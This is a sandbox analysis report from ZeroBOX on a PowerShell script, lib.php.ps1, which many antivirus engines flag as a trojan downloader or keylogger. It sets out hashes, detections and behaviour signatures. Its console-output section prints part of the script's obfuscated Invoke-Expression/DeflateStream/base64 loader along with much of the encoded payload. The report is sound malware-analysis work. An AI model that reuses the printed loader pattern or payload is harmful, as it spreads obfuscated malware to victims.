Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 17, 2024, 9:24 a.m.	June 17, 2024, 9:26 a.m.

Size	7.9KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`ec1b518541228072eb75463ce15c7bce`
SHA256	`767a9085f6d793a1583ab5b850a3fe235f236a3e09493b91556320641dbbd616`
CRC32	`90F5CFB4`
ssdeep	`192:uYV8qn42ZROyPcC8g4NECyynq1mZkdlZ1eQ4mjpXY:1Vn4uJHn4Bdq1m6vtY`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\lib.php.ps1
3016

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 109 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: Invoke-Expression : Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\lib.php.ps1:1 char:8074 console_handle: 0x0000002f	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: + (new-ObJEct syStEm.IO.cOmpreSsION.DefLaTEsTReam([SYstem.IO.mEMOrYsTrEaM][SYs console_handle: 0x0000003b	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: TEM.conVERT]::FRoMbAse64sTRiNg('fTtrU+LKtp9nV+3/kEpZO1AKA/h27tw6ERmHIwIHwjiz3V4 console_handle: 0x00000047	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 7QNQcQ5KdNCqH4r+ftVZ3J52glykhj+5e72f37Kwn6TNrHZ5uDOPrLV8NvbuKuW5t1s3NurExa98sL+ console_handle: 0x00000053	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: HWnvUCf7Oob1UN44sBn5316WPM/MUGJ8UdOelgs97Ppj5Y/THMinl3AD9TN+0cHXyLRtdw4/j9S3xoO console_handle: 0x0000005f	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 2LBP8T0fZwI002j9mBYvgsjzoMOfOM6Hq+92CMcD4PFMBx1AK+WT/C4YtzyXwL9psIE1jwkZGjBn7jS console_handle: 0x0000006b	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: auzgYvYcUKhfT+B6UXe+j/AZIubBSoTSzrrJTh+PW//cAF+cX7FauKXWs7x+e3Dhh5cwjePcn05dsec console_handle: 0x00000077	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: PhaKgioanHeRjDXnpjnx7GhBInRxCshfC8+v/CIIU3EweBggkHfQQ3KCPIrGq1QxiS2OfVesiOA+5Pf console_handle: 0x00000083	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: Z4DkcsJXH64SLhPWSxb5/D91knwLEVgDxUQlVSAZ4Sxwf1BxjZRfzTX2PeWcBFvQtfHYRC6HxbhjPuR console_handle: 0x0000008f	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 6HRDR/Y4KqzMta//4ZqM3QTd2FUxA1+blOe+OHjHfB7wkYb8aL6+2/iokAVEgVQfriJ704DLyOs1ncX console_handle: 0x0000009b	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: HlK3v8kGC1ytxI/5GQx8JVZJPZqOvL8ncRC5c5z8ww2WMHtn3WeTXm9T/VKGvJ+pGq/9gPkSMnwRIjo console_handle: 0x000000a7	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: CSuTE2zECJASm0RKFOneTlQbRNHVYTcVnObuGZEqMJbVFYpUoTQKFcNAQ4smoh2IsUDZJiKzff/uUyc console_handle: 0x000000b3	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: UPWZc5N8ybJh7717gzZml30B8rMWlYKQUgDuRsB03+IVmwzQEShEQMVUsIgTgOspAC0FDcUt7B9N8es console_handle: 0x000000bf	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: g/h9L3XGqqkuT6F9w2y6CMafAz3LcEGAfSAoJ+INerDCN0OwFp6KUc+jp88VNp5Wr+R5p5EafQg4bwS console_handle: 0x000000cb	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: j9MU2IMW6EuVCertaLFw8VkCxvYlZ9DOGsjrxg47e+2cs1GH/WsSs2Bgzzd1c8LGXmJfdlifm8ZXo4K console_handle: 0x000000d7	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 8JNTWLYEqEtIESppHRM2BoOaAqEOimnCL9O4ri23hBJjfPM0c0EH9+BDQMsboKE8a9eZBE2/R5wbejT console_handle: 0x000000e3	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: e98vlnJAU1omrYMfwc7h/X94+MyhVcN4wKEuUtos8nx3W4bDbqb1+MG5/oj/7jB4H7+RBf4L9G/aAFP console_handle: 0x000000ef	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 9/Rex4dfEFAb0fofI3Af/aMS2/2HFWN9hO+NjrzxwhBw7qN+tERXD2Apnwm6HADIObRa2r0HcHRotJl console_handle: 0x000000fb	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: mk1WBG4fTEHKCw1fV7dWIWDgiDeUOdgbGtv3koo1CwY2ELqF40HZuFCxPK5MV+TXb+/gRbOhy/0hSip console_handle: 0x00000107	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: Gvp5SdsMis0BFE2ZCJqxZh+X7GkKNKgUZv7sxagEHENnt7i44Uc0Qha4RUXayYk/M+7m5haHM39yBbh console_handle: 0x00000113	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: UoA8J4beQCewGBS8RigTCv/dBfLBdGAy7dN7psHR5qNEnHuyWIfeXRkL6xJEoKYtsnCTQOdJ6g+0Ouz console_handle: 0x0000011f	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: MibrYQbhG90iTkz1FwhmVqNAmXV2CXKKUFhkKGcnZk8mtpphx0djJ1Rl/UvTXBv08GE9ec2G7Ff3ztv console_handle: 0x0000012b	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: m7KNshmMjDk7u+lMhZUOpZF+99w567BRatYrlm3tWnOICPVu+BI9e5VSBAe82oh2yD00D15DO1jFEMD console_handle: 0x00000137	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 3QLKLZcD92E3A3nYt0A/4XtRwQZe7X+DXsHZNpZVfd4S7PlMPzAzjTdFJx9HYmbDh3GWOjQrx6VOM4b console_handle: 0x00000143	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: OCV59ux1ngvGA2tzd75cchsxedDT6t4tcfWWLU0NIS0NoUozkSlfpEId77/Ibc9NjS5zY0Va/JOKyi6 console_handle: 0x0000014f	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: sdmeT9BXn07wVHhrGSTBWPvk9kMhD1i1K4aGdKHNPBImhwhEVI+l3JavRPOIgwvjwgGUjr8eeN1gu2j console_handle: 0x0000015b	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: m1EqoejJUgUhXRHSXBXbZY5RVm6RB7jnK05sm7uFQOuFrH3PJs7DyQY06hKMY9fCofCT5ppFAnNcoag console_handle: 0x00000167	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 6b7Ow6YlMI3cl5TCrx2VkHMkc/T4KEBGDeJcjRkbE0itK88GIHAZWNIZsPOVgNGBGj2hGc2Yzxz3/xb console_handle: 0x00000173	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 3xZg/4tOUyISPnmCledhw00GuZU6q0JZM3IGufE9o+Zp9np49DTHoxsa6bL8wGnEzAwu+zcWfEe37YY console_handle: 0x0000017f	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: RA+PftqbEqW+A8VQDkejDlLOWAYPoKTDD3S6UnQ2xiklGQRn3bWswGYP/PH8QYjrVmrlQ2MJSxsk+Xy console_handle: 0x0000018b	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 2oWfxlHqo32dGSYYK8gmgr9kUSNjBUu1Qhft1/tqCWwAxDBiqQMM4i7CMHdmUYgLMfPa/nn/rdvr3I+ console_handle: 0x00000197	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 7f3aYiZDwz1QTYwZEzJGx4NdhZrNBn60xzGEA3qZBFW39Bz/wmPkFMKXLEOT/lYnMUc6NUn7hyuUhib console_handle: 0x000001a3	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: XZtQfXhimQMXUKGJIgh1Ys5AjQ6dF3zQFfdoZuioPVfI4D1w8zYnJosAhAA3ckqNkBVnLhcHDgNudrN console_handle: 0x000001af	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: VMknjgb8vtAsE+Oomz1c/oUvdbjpzhDNemwcRz1x52NjG77MqPXai8y+pdIpfNLT/mwZ692g6o/SXxD console_handle: 0x000001bb	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: gayBLxuLzE4EBNT6IT979c4h+/17GVM8gNDo8adortu6gAOJJKx4Hs1XMH3IBqALFzbwgBBGByv89oP console_handle: 0x000001c7	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: y2yBNO+HXNvND0tGh5rXp2uNeUrl2+7DKYPTr684a7HDZ2VTvxBhZEgG/QXGelAdXvkIV2NJXkAcWmY console_handle: 0x000001d3	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: bIkTBj2krJyW+5AUXuVHMN/6hUKPgK14pJaUNk04eUfmb1/Akx/1haeH0eBDAQ3eRYZs/tJ4TPv0q3t console_handle: 0x000001df	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: YijhFfWDbis20seVe8kdvi3WaZeso/Z5B5Mw2zg9iIIuljK4vK37e9ucrd/gJHVzMoJkVkI+NyfGbhQ console_handle: 0x000001eb	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: vCTqZ0bKXXLzkP8Ba0NLTG1oeiNDhgwXGCBAz7FiwnnB3EMs6kKVzwGRLOoVXdtYxT1JSTEbzcrURRv console_handle: 0x000001f7	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: Rei7yuVDFP1DwSleUpXE7RzgPhthXIDj8yltNI50mIuXajTFI+EmBWpndUurHv0WU4D8mxdlECoC9Ea console_handle: 0x00000203	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: Gx/MaJJqH2Rq+/ORHmx1ORXWYSkjQF8AZBdtO2/i6LajjLwu7PTLG4HIxpGVxdFZrlJFoDZ1hY7gCvt console_handle: 0x0000020f	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: xhdFNrsitbiLnVpViVGWsl8TNrDvW2cDYvm8iWZzmqbI4YlyiUoZ1CZwvl7a3hYlGDF45CxbDEcy8xo console_handle: 0x0000021b	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: rsDLGrBceZOGoqcLZ4hSf0m5PUyk9GA+znHb19UskIm6L4ZhqhQlCwg1L25ZbxDMM5qySM+5kFGx7im console_handle: 0x00000227	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 3RUQTKctTyPdQ8qSXPYWqB6scqnkwnF+zWe8ZMvHZYMn6jkkV0GZ3t5oD3aqDcMoV1j9dqn521gs2C5 console_handle: 0x00000233	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: 7Vg1180GbBc1M+KdY4mlWrwtqURaa06Cyp/fGuzlkBckhPYq1lCj7DQMfiLb7oN/UL330MIUL6s7T4Y console_handle: 0x0000023f	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: gTc9RceJITgraJ47CUv/swrDRp7s2Xi81V9CE5pBtVF8AX9Hbi+WeCmqdHuXa3Jbwpfawqniq7ZJLcK console_handle: 0x0000024b	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: RH2Vv+SC9zpv7oyPYy8IAMpXniw98MrEMTtgXXu8uW0iA3XbMCA4U/vXoGpMMBu435ADSx03ZBAl4cp console_handle: 0x00000257	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: owHOhNlX8kBsvPmpw9Ytcye0x307lUpbEg/V89j4iqL+wiJx8zdqoBNqwQ9V4OsjT1crUEiW88Uyhp4 console_handle: 0x00000263	1	1
WriteConsoleW June 17, 2024, 9:24 a.m.	buffer: pdixWlxy4X9izBBl0CW8AFeMIQQQVEy/+xxWL4oUKmzUCJb1s0Tm+ZKksW2ICFYx9lCX4bky1CprJEz console_handle: 0x0000026f	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey June 17, 2024, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 17, 2024, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 17, 2024, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 17, 2024, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 17, 2024, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 17, 2024, 9:24 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00336058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 17, 2024, 9:24 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (31 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05691000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05446000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 17, 2024, 9:24 a.m.	process_identifier: 3016 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 31 AntiVirus engines on VirusTotal as malicious (31 events)

Lionic	Trojan.Script.Boxter.4!c
Cynet	Malicious (score: 99)
Skyhigh	Artemis!Trojan
VIPRE	Heur.BZC.PZQ.Boxter.797.DD1D5A15
Arcabit	Heur.BZC.PZQ.Boxter.797.DD1D5A15
Symantec	ISB.Downloader!gen173
TrendMicro-HouseCall	TROJ_FRS.0NA103DO24
Avast	PwrSh:Iex-C [PUP]
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	Heur.BZC.PZQ.Boxter.797.DD1D5A15
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.797.DD1D5A15
Emsisoft	Heur.BZC.PZQ.Boxter.797.DD1D5A15 (B)
F-Secure	Trojan.TR/PowerShell.Gen
DrWeb	PowerShell.Packed.24
TrendMicro	TROJ_FRS.0NA103DO24
FireEye	Heur.BZC.PZQ.Boxter.797.DD1D5A15
Sophos	Mal/PSDL-J
Ikarus	Trojan.PowerShell.Crypt
Google	Detected
Avira	TR/PowerShell.Gen
Microsoft	Trojan:Script/Wacatac.B!ml
ViRobot	BIN.S.Agent.8113
ZoneAlarm	HEUR:Trojan.PowerShell.Generic
GData	Heur.BZC.PZQ.Boxter.797.DD1D5A15
Varist	PSH/Kryptik.A.gen!Camelot
AhnLab-V3	Trojan/PowerShell.KeyLogger
TACHYON	Script/W32.Agent.CDQ
Tencent	Win32.Trojan.Generic.Oqil
MAX	malware (ai score=81)
AVG	PwrSh:Iex-C [PUP]
alibabacloud	Trojan:Win/BZC.POV

lib.php.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All